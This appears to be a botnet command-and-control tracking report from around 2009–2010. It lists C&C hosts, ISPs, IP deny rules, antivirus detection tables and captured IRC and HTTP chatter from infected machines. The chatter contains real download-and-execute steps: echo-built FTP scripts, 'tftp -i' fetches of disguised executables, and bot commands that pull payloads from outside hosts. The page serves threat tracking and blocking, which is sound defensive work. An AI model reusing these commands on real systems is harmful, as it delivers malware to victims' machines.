- Server: 221 Goodbye happy r00ting.
- Client: NICK gyreobciUSER cwbkcdugs 0 0 :gyreobci
- Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your...
- Client: USERHOST gyreobci
- Client: MODE gyreobci +xiJOIN ##Stab## qifort1USERHOST gyreobciMODE...
- Server: PONG :irc.priv8net.com
- Client: JOIN ##Stab## qifort1
- Server: PONG :irc.priv8net.com
- Client: JOIN ##Stab## qifort1
- Server: PONG :irc.priv8net.com
- Client: JOIN ##Stab## qifort1
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 3 |
TCP Ports 5190
67 |
Filter deny ip host 83.68.16.6 any log ! 3 infects 08/23/09 to 09/19/09 xs4all.nl |
ISP xs4all internet bv |
| Clients 3 |
netherlands |
Activity |
Domain xs4all.nl |
Chatter Example
- Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
- Client: NICK znbXghHO
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
- Client: MODE znbXghHO +xi
- Client: JOIN #las6 USERHOST znbXghHO
- Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
- Client: MODE #las6 +smntu
- Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
- Client: USER qifonx qifonx qifonx :imeqgcebisvovxly
- Server: NOTICE AUTH :*** Looking up your hostname...NOTICE AUTH :***...
- Server: NICK znbXghHO
- Client: USER qifonx qifonx qifonx :imeqgcebisvovxlyNICK znbXghHO
- Client: MODE znbXghHO +xi
- Client: JOIN #las6 USERHOST znbXghHO
- Server: :znbXghHO!qifonx@192.168.1.192 JOIN :#las6
- Client: MODE #las6 +smntu
- Server: :norks.org MODE #las6 +nt:norks.org 353 znbXghHO = #las6 :@wloos...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Win-Nepoe.58880 |
| AntiVir | TRCrypt.XPACK.Gen |
| Authentium | Nepoe.A |
| Avast | MISSED |
| AVG | SHeur2.AIJS |
| BitDefender | IRC-Generic.5049 |
| CAT-QuickHeal | Nepoe.hm |
| ClamAV | MISSED |
| DrWeb | Packed.162 |
| eSafe | TRCrypt.XPACK |
| eTrust-Vet | Linkbot.VJ |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Nepoe.YW!tr |
| F-Prot | Nepoe.A |
| F-Secure | Nepoe.hm |
| Ikarus | Packer.Krunchy.B |
| Kaspersky | Nepoe.hm |
| McAfee | MISSED |
| Microsoft | Poebot |
| NOD32v2 | MISSED |
| Norman | Smalltroj.dam |
| Panda | BckNepoe.F |
| Prevx1 | MISSED |
| Rising | Undef.dnb |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | IRCBot |
| TheHacker | MISSED |
| TrendMicro | BKDR_NEPOE.CW |
| VBA32 | Nepoe.hm |
| VirusBuster | Nepoe.DL |
Webwasher
Gateway | MISSED |
| |
|
| Priority 2 |
TCP Ports 65520
216 |
Filter deny ip host 221.5.74.40 any log ! 2 infects 08/18/09 to 08/18/09 cncnet.net |
ISP china unicom guangdong province network |
| Clients 2 |
china |
Activity |
Domain cncnet.net |
Chatter Example
- Client: NICK tztznbvfUSER f020501 . . :-
- Server: NICK tztznbvfUSER f020501 . . :-JOIN &virtu
- Server: :j. PRIVMSG tztznbvf :!get http:/dretis.cn/oc/box.txt
- Client: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
- Server: GET /bt5/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /lib/bot.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /lib/abb.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /ag/lo.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /dll/mal.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Trojan-Downloader.Obitel |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | TrojanDownloader_Obitel.gen!C |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 2 |
TCP Ports 13001 12351 |
Filter deny ip host 122.160.232.194 any log ! 2 infects 09/13/09 to 10/30/09 122.airtelbroadband.in |
ISP abts-dsl-del |
| Clients 2 |
 india |
Activity |
Domain 122.airtelbroadband.in |
Chatter Example
- Client: echo open 85.179.166.148 17323>.pif C:\\WINDOWS\\system32>
- Client: echo user a a>>.pif C:\\WINDOWS\\system32>
- Client: echo binary>>.pif C:\\WINDOWS\\system32>
- Client: echo GET iexplorer.exe>>.pif C:\\WINDOWS\\system32>
- Client: echo bye>>.pif C:\\WINDOWS\\system32>
- Client: echo @echo off >c.batC:\\WINDOWS\\system32>
- Client: echo ftp -n -v -s:.pif >>c.batC:\\WINDOWS\\system32>
- Client: echo iexplorer.exe >>c.batC:\\WINDOWS\\system32>
- Client: echo del .pif >>c.batC:\\WINDOWS\\system32>
- Client: echo del /F c.bat >>c.batC:\\WINDOWS\\system32>
- Client: echo exit /y >>c.batC:\\WINDOWS\\system32>
- Client: USER a
- Client: PASS a
- Server: RETR iexplorer.exe
- Client: NICK `tkhjqhirUSER `tkhjqhir 0 0 :`tkhjqhir
- Server: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname...
- Client: JOIN #.has hs
- Client: USERHOST `tkhjqhirJOIN #.has hsUSERHOST `tkhjqhirJOIN #.has...
- Server: :`tkhjqhir!~tkhjqhir@183C7886.415835BD.ED5D58B5.IP JOIN...
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
- Server: PONG :irc.priv8net.com
- Client: JOIN #.has hs
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRSpy.Games.A |
| Authentium | STZ_like!Generic |
| Avast | MISSED |
| AVG | PolyCrypt |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | STZ_like!Generic |
| F-Secure | Suspicious_Malware!Gemini |
| Ikarus | Virut.n |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | Spy.Games.A |
| |
|
| Priority 2 |
TCP Ports 80 |
Filter deny ip host 68.178.232.100 any log ! 2 infects 12/13/09 to 01/22/10 secureserver.net |
ISP godaddy.com inc |
| Clients 2 |
united states |
Activity |
Domain secureserver.net |
Chatter Example
- Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
- Server: GET /?245e7ff8 HTTP/1.1Accept: */*Accept-Language:...
- Server: GET / HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding:...
- Server: GET /sd?s=95308&f=1 HTTP/1.1Accept: */*Referer:...
- Server: GET /sd?s=95308&f=1&C=1 HTTP/1.1Accept: */*Referer:...
- Server: GET /apps/domainpark/show_afd_ads.js HTTP/1.1Accept: */*Referer:...
- Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/hdr_parked_ppc_4.png?245e7ff8 HTTP/1.1Accept:...
- Server: GET /images/061703/spc_trans.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/hdr_parked_ppc_4.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_gdlogo.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/mrkt_250x80_4.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/tp250x80_7.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_saletag.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_parkedfreetext_b.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/but_search.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/tp468x60_7.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_prodadv.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ban_199_3.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/061703/but_go_orange_green.gif HTTP/1.1Accept:...
- Server: GET /images/img_orangearrows.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/dbs_2.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/log_me.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_hosting.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_biz3.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/log_icann.png HTTP/1.1Accept: */*Referer:...
- Server: GET / HTTP/1.1Accept: */*Referer:...
- Server: GET /images/img_footertext2.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/bul_blacksquare.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/bul_bluesquare.png HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_wst.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /images/ad_ppc_gdauctions.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /assets/spc_trans.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_toplft.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_toprt.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_botlft.gif HTTP/1.1Accept: */*Referer:...
- Server: GET /aaa/help/hlp_botrt.gif HTTP/1.1Accept: */*Referer:...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 2 |
TCP Ports 3305 |
Filter deny ip host 89.208.33.88 any log ! 2 infects 11/15/09 to 11/18/09 di-net.ru |
ISP hosting and colocation services |
| Clients 2 |
russian federation |
Activity |
Domain di-net.ru |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 67.55.178.248 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 67.55.178.248 get dllhost.exe wins\\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|i5vvaj0awUSER mlj7x67ke * 0 :USA|XP|867
- Server: :hub.14020.net 001 P|i5vvaj0aw...
- Client: USERHOST P|i5vvaj0aw
- Server: :hub.14020.net 302 P|i5vvaj0aw...
- Client: USERHOST P|i5vvaj0awMODE P|i5vvaj0aw JOIN #mm RSA
- Client: PRIVMSG #mm...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Virut.7116 |
| Avast | _Virtob |
| AVG | Virut |
| BitDefender | Virtob.8.Gen |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Virut.7116 |
| F-Secure | Virtob.8.Gen |
| Ikarus | Kolabc |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AC |
| NOD32v2 | MISSED |
| Norman | Virut.AG |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Virut.an |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Virut.Gen.4 |
Webwasher
Gateway | MISSED |
| |
|
| Priority 2 |
TCP Ports 2569 3938 |
Filter deny ip host 89.149.227.51 any log ! 2 infects 10/16/09 to 10/17/09 internetserviceteam.com |
ISP netdirekt e.k |
| Clients 2 |
germany |
Activity |
Domain internetserviceteam.com |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 113.253.112.208 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 113.253.112.208 get dllhost.exe wins\\DLLHOST.EXE
- Client: USER smpbcb smpbcb smpbcb :gywmthsyspraopyh
- Client: NICK tiHIjEan
- Server: :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
- Server: :irc.foonet.com NOTICE AUTH :*** Couldn\\'t resolve your...
- Client: MODE tiHIjEan +xi
- Server: File is missing:tiHIjEan MODE tiHIjEan :+iwx
- Client: JOIN ##russia## USERHOST tiHIjEan
- Client: MODE ##russia## +smntu
- Client: GET /dive.exe HTTP/1.0Host: 89.149.227.51
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | Palevo.jur.20 |
| Authentium | MISSED |
| Avast | _Trojan-gen |
| AVG | Dropper.Generic.AYVO |
| BitDefender | Generic.2518038 |
| CAT-QuickHeal | Agent.ATV |
| ClamAV | MISSED |
| DrWeb | IRC.Sdbot.5190 |
| eSafe | TrojanProxyRan |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | PossibleThreat |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Pushbot |
| Kaspersky | P2P-Palevo.jur |
| McAfee | Autorun.aah |
| Microsoft | Malagent |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalGeneric-A |
| Sunbelt | MISSED |
| Symantec | IRCBot |
| TheHacker | MISSED |
| TrendMicro | TROJ_AGENT.ICZZ |
| VBA32 | Kolab.ear |
| VirusBuster | P2P.Palevo.EAN |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 18067 |
Filter deny ip host 204.45.13.42 any log ! 1 infects 01/06/10 to 01/06/10 - |
ISP - |
| Clients 1 |
 - |
Activity |
Domain - |
Chatter Example
- Client: USeR l l l l
- Client: NiCK l5-00029f63
- Client: PoNG :8BC55D68
- Server: :a 001 l5-00029f63 :l5-00029f63 MODE l5-00029f63 :+i
- Client: USeRHOST l5-00029f63
- Client: JOiN #l5t3 dlrowymx0ri
- Server: :l5-00029f63!l@192.168.1.160 JOIN :#l5t3
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Win-Small.6694 |
| AntiVir | BDSSmall.EO |
| Authentium | BAE |
| Avast | _Trojano-1124 |
| AVG | Small.27.AQ |
| BitDefender | Generic.24785 |
| CAT-QuickHeal | Small.eo |
| ClamAV | SdBot-730 |
| DrWeb | Restrict |
| eSafe | Stration |
| eTrust-Vet | Cuebot.E |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | RPC.WALLZ!worm |
| F-Prot | BAE |
| F-Secure | Small.eo |
| Ikarus | IM-Opanki.O |
| Kaspersky | Small.eo |
| McAfee | Sdbot.gen |
| Microsoft | Small.BX |
| NOD32v2 | MISSED |
| Norman | Suspicious_M.gen |
| Panda | BckSmall.HI |
| Prevx1 | MISSED |
| Rising | Mocbot.a |
| Sophos | Hwbot-A |
| Sunbelt | MISSED |
| Symantec | Trojan |
| TheHacker | BackdoorSmall.eo |
| TrendMicro | BKDR_SDBOT.GAA |
| VBA32 | Small.eo |
| VirusBuster | Small.AEE |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 6667 |
Filter deny ip host 38.97.225.135 any log ! 1 infects 10/29/09 to 10/29/09 cogentco.com |
ISP psinet inc |
| Clients 1 |
united states |
Activity |
Domain cogentco.com |
Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
- Server: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 213.16.201.41:7314
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Parite |
| AntiVir | Parite |
| Authentium | Korgo.V |
| Avast | _Parite |
| AVG | Korgo.A |
| BitDefender | Padobot.BV.Dam |
| CAT-QuickHeal | Perite.B |
| ClamAV | Padobot.M |
| DrWeb | Lsabot |
| eSafe | _Parite_B |
| eTrust-Vet | Pinfi.A |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Parite.B |
| F-Prot | Korgo.V |
| F-Secure | Padobot.BV.Dam |
| Ikarus | Padobot.M |
| Kaspersky | Padobot.m |
| McAfee | Pate.b |
| Microsoft | Korgo.V |
| NOD32v2 | MISSED |
| Norman | Korgo.V |
| Panda | Korgo.U.worm |
| Prevx1 | MISSED |
| Rising | Parite.b |
| Sophos | Parite-B |
| Sunbelt | MISSED |
| Symantec | Pinfi |
| TheHacker | Pate.B |
| TrendMicro | PE_PARITE.A |
| VBA32 | Parite.B |
| VirusBuster | Padobot.D |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 16667 |
Filter deny ip host 92.243.19.221 any log ! 1 infects 01/18/10 to 01/18/10 ghst.net |
ISP gandi dedicated hosting servers |
| Clients 1 |
france |
Activity |
Domain ghst.net |
Chatter Example
- Client: NICK [USA]XP-SP0[00]1198USER glplur 0 0...
- Server: :MBoY.Org NOTICE AUTH :*** Looking up your hostname...
- Server: :MBoY.Org NOTICE AUTH :*** Couldn\\'t resolve your hostname;...
- Server: Org 422 [USA]XP-SP0[00]1198 :MOTD File is...
- Client: USERHOST [USA]XP-SP0[00]1198
- Client: MODE [USA]XP-SP0[00]1198 -x+iJOIN #l# lamUSERHOST...
- Server: PONG :MBoY.Org
- Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
- Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Client: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /rshadel/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Server: GET /error/404.phtml HTTP/1.0User-Agent: Mozilla/4.0...
- Server: + \\google-analytics.com/ga.js\\'...
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: GET /g0th1c/mxx.exe HTTP/1.0User-Agent: Mozilla/4.0...
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: :MBoY.Org 404 [USA]XP-SP0[00]1198 #l# :You must have a registered...
- Server: PONG :MBoY.Org
- Server: :|!X@admin.com MODE #l# +m
- Server: :|!X@admin.com MODE #l# +m
- Server: PONG :MBoY.Org
- Server: PONG :MBoY.Org
- Server: :|!X@admin.com PRIVMSG #l# :.l lam -s
- Server: :|!X@admin.com PRIVMSG #l# :.g3t...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 3308 |
Filter deny ip host 217.30.180.76 any log ! 1 infects 10/15/09 to 10/15/09 nebula.fi |
ISP nebula oy. web hosting pri-dns and streaming |
| Clients 1 |
finland |
Activity |
Domain nebula.fi |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 125.4.228.60 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 125.4.228.60 get dllhost.exe wins\\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|m80s5khyjUSER e5idmiq5g * 0 :USA|2K|865
- Server: :hub.82.net 001 P|m80s5khyj...
- Client: USERHOST P|m80s5khyj
- Server: :hub.82.net 302 P|m80s5khyj :P|m80s5khyj=+e5idmiq5g@192.168.1.209
- Client: USERHOST P|m80s5khyjMODE P|m80s5khyj JOIN #mm RSA
- Client: PRIVMSG #mm...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Virut.7116 |
| Avast | _Virtob |
| AVG | Virut |
| BitDefender | Virtob.8.Gen |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | Virut.30 |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Virut.7116 |
| F-Secure | Virut.av |
| Ikarus | Kolabc |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AC |
| NOD32v2 | MISSED |
| Norman | Virut.AG |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Virut.an |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Virut.Gen.4 |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 80
216 |
Filter deny ip host 97.74.144.31 any log ! 1 infects 10/14/09 to 10/14/09 jws.com |
ISP godaddy.com inc |
| Clients 1 |
united states |
Activity |
Domain jws.com |
Chatter Example
- Server: echo off&echo open 91.66.198.112 1023>>cmd.ftp&echo...
- Client: USER anonymous
- Client: PASS bin
- Server: RETR 12394_upload.exe
- Client: GET /images/logos.gif?51dff=2347513 HTTP/1.0User-Agent: KUKU...
- Server: GET /result?52552 HTTP/1.0User-Agent: Opera/9.00 (Windows NT 5.1;...
- Server: GET /h2/mainh.gif?528fb=338171 HTTP/1.0User-Agent: KUKU v5.06exp...
- Server: GET /images/logos.gif?531c5=680842 HTTP/1.0User-Agent: KUKU...
- Server: GET /?342546 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
- Server: GET /h2/?s=938 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE...
- Server: GET / HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
- Server: GET /home_imag/mainf.gif?53e68=1718280 HTTP/1.0User-Agent: KUKU...
- Server: GET /logos.gif?53fee=2752368 HTTP/1.0User-Agent: KUKU v5.06exp...
- Server: GET /images/logos.gif?54bf5=1041375 HTTP/1.0User-Agent: KUKU...
- Server: GET /images/mainf.gif?54df8=1738200 HTTP/1.0User-Agent: KUKU...
- Server: GET /images/logos.gif?54ea4=3478120 HTTP/1.0User-Agent: KUKU...
- Server: GET /images/logos.gif?55aaa=2105340 HTTP/1.0User-Agent: KUKU...
- Server: GET /utest/?jutr=31444&oo=2&57835=264973&ra=0 HTTP/1.0User-Agent:...
- Server: GET /test/gewtghywa.dat HTTP/1.0X-Forwarded-For:...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Kashu.B |
| AntiVir | Sality.Y |
| Authentium | Sasser.E |
| Avast | _Sality |
| AVG | I-Sasser.E |
| BitDefender | Generic.24440 |
| CAT-QuickHeal | Sality.R |
| ClamAV | Sasser.H |
| DrWeb | Sector.5 |
| eSafe | MISSED |
| eTrust-Vet | Sality.AA |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Sality.AA |
| F-Prot | Sasser.E |
| F-Secure | Sasser.D |
| Ikarus | Email-Plexus.E |
| Kaspersky | Sality.aa |
| McAfee | Sality.gen |
| Microsoft | Sality.AM |
| NOD32v2 | MISSED |
| Norman | Sasser.E |
| Panda | Sasser.E.worm |
| Prevx1 | MISSED |
| Rising | KUKU.GEN |
| Sophos | Sality-AM |
| Sunbelt | MISSED |
| Symantec | Sality.AE |
| TheHacker | Sality.gen |
| TrendMicro | PE_SALITY.EN |
| VBA32 | Sality.kaka |
| VirusBuster | Sasser.E |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 80 |
Filter deny ip host 194.67.57.20 any log ! 1 infects 09/03/09 to 09/03/09 mail.ru |
ISP sovintel-msk-netbridge-ervices-net |
| Clients 1 |
russian federation |
Activity |
Domain mail.ru |
Chatter Example
- Client: GET /lsd HTTP/1.0User-Agent: bHost: 66.220.226.83:50929
- Server: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRDropper.Gen |
| Authentium | Heuristic-MUP!Eldorado |
| Avast | _Padobot-D@UPX |
| AVG | MISSED |
| BitDefender | Generic.69904 |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | WormPoxdar.A.D |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Heuristic-MUP!Eldorado |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | Poxdar.A |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalHckPk-E |
| Sunbelt | MISSED |
| Symantec | Poxdar |
| TheHacker | MISSED |
| TrendMicro | PAK_Generic.001 |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 1 |
TCP Ports 3305 |
